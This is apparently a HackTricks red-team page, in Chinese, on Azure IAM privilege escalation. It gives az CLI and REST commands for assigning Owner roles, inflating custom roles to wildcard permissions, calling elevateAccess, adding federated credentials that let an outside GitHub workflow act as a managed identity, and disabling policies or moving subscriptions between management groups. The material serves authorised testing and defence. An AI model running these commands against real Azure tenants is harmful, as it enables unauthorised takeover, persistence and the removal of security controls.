Az - Azure IAM Privesc (Authorization)

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

Azure IAM

更多信息请查看:

Az - Entra ID (AzureAD) & Azure IAM

允许 principal 更改 authorization 本身 的权限通常是 privesc primitives。当它们被授予在 management groupsubscription 范围时,这尤其危险,因为这些权限会被子资源继承。

Microsoft.Authorization/roleAssignments/write

此权限允许在特定 scope 上创建 role assignments,使攻击者能够通过给自己或另一个受控 principal 分配更高权限的 role 来提升权限。

Typical flow:

# Login and confirm current context
az login
az account show

# Enumerate current assignments and find the custom role granting this action
az role assignment list --all --output table
az role definition list --name "<role-definition-name>"

如果被入侵的 principal 在某个 scope 上拥有此 action,它可以直接授予一个 privileged role,例如 OwnerContributorKey Vault Secrets Officer,或该 scope 中可用的任何其他 built-in/custom role:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

知道目标 user/service principal/managed identity 的 principal object ID 就足以授予新的 role。这可以被用于 self-privesclateral movementpersistence,方法是将该 role 分配给另一个受控 principal。

Microsoft.Authorization/roleDefinitions/write

这个 permission 允许创建或修改 custom role definitions。实际上,这很危险,因为 attacker 可以:

  • 修改一个已经分配给 compromised principal 的 custom role,使新的 permissions 立即生效。
  • 创建一个新的 over-privileged custom role,然后再将其分配,通常会和 Microsoft.Authorization/roleAssignments/write 链式使用。

Typical flow:

# Find the current assignments
az role assignment list --all --output table

# Review the role definition currently assigned to the compromised principal
az role definition list --name "<role-definition-name>"

{
"roleName": "<name of the role>",
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"],
"id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>"
}

然后使用前面的定义更新 role permissions,调用:

az role definition update --role-definition role.json

如果被修改的 role already assigned 给攻击者,这会比创建新的 role assignment 更快,因为 permission inflation 会应用于现有 assignment。
如果攻击者只有 roleDefinitions/write,他仍然可以通过修改已经分配给 compromised principals 的 roles 来将其 weaponize。

Microsoft.Authorization/elevateAccess/action

这个 permissions 允许提升 privileges,并能够向任意 principal 为 Azure resources 分配 permissions。它的设计目的是授予 Entra ID Global Administrators,以便他们也可以管理 Azure resources 上的 permissions。

Tip

我认为用户需要在 Entrad ID 中是 Global Administrator,elevate 调用才会生效。

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"

Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write

此权限允许在 user-assigned managed identities 上创建/更新 Federated Identity Credentials (FICs)。实际上,这使攻击者可以向外部 identity provider 添加新的信任关系,然后以该 managed identity 的身份获取 tokens。

这是一个 persistence / identity hijacking primitive:如果该 managed identity 已经有权访问 Azure resources,攻击者只需要创建一个匹配的外部 workload(例如,GitHub Actions workflow),然后将外部 token 交换为 Azure tokens。

在滥用之前,建议先确认以下有用信息:

  • 哪个 managed identity 可以被修改
  • 已经分配给该 managed identity 的 scope/roles
  • 在 token exchange 时会接受哪个 issuersubjectaudience

你可以使用专用 CLI 命令创建 FIC:

az identity federated-credential create \
--name "github-federated-identity" \
--identity-name testMI \
--resource-group bialystok-rg \
--issuer "https://token.actions.githubusercontent.com" \
--subject "repo:REPO/IAMTEST:ref:refs/heads/main" \
--audiences "api://AzureADTokenExchange"

或者使用原始 REST。

给予 managed identity 访问 GitHub repo 的示例命令:

# Generic example:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'

# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'

一旦创建了 FIC,攻击者就可以从外部 workload 进行身份验证,并使用在 Azure 中已经授予的 managed identity 权限。有关滥用 GitHub OIDC / workload identity 的更多信息,请查看:

Az Federation Abuse

Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete

拥有 Microsoft.Authorization/policyAssignments/writeMicrosoft.Authorization/policyAssignments/delete 权限、作用于 management group、subscription 或 resource group 的攻击者,可以修改或删除 Azure policy assignments,从而可能禁用阻止特定操作的安全限制

这会使其能够访问先前受该 policy 保护的资源或功能。

删除一个 policy assignment:

az policy assignment delete \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

禁用一个 policy assignment:

az policy assignment update \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
--enforcement-mode Disabled

验证更改:

# List policy assignments
az policy assignment list \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

# Show specific policy assignment details
az policy assignment show \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Microsoft.Authorization/policyDefinitions/write

具有 Microsoft.Authorization/policyDefinitions/write 权限的攻击者可以修改 Azure policy definitions,更改控制整个环境安全限制的规则。

例如,限制创建资源时允许区域的 policy 可以被修改为允许任何区域,或者可以更改 policy effect 使其失效。

修改一个 policy definition:

az policy definition update \
--name "<policyDefinitionName>" \
--rules @updated-policy-rules.json

验证更改:

az policy definition list --output table

az policy definition show --name "<policyDefinitionName>"

Microsoft.Management/managementGroups/write

具有 Microsoft.Management/managementGroups/write 权限的攻击者可以 修改 management groups 的层级结构创建新的 management groups,从而可能规避应用于更高层级的限制性 policies。

例如,攻击者可以创建一个没有限制性 policies 的新 management group,然后将 subscriptions 移动到其中。

Create a new management group:

az account management-group create \
--name "yourMGname" \
--display-name "yourMGDisplayName"

修改 management group 层级:

az account management-group update \
--name "<managementGroupId>" \
--parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"

验证更改:

az account management-group list --output table

az account management-group show \
--name "<managementGroupId>" \
--expand

Microsoft.Management/managementGroups/subscriptions/write

拥有权限 Microsoft.Management/managementGroups/subscriptions/write 的攻击者可以在 management groups 之间移动 subscriptions,从而有可能通过将 subscription 移动到一个限制更少或没有 policies 的 group 来绕过 restrictive policies

将 subscription 移动到不同的 management group:

az account management-group subscription add \
--name "<managementGroupName>" \
--subscription "<subscriptionId>"

验证更改:

az account management-group subscription show \
--name "<managementGroupId>" \
--subscription "<subscriptionId>"

参考资料

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks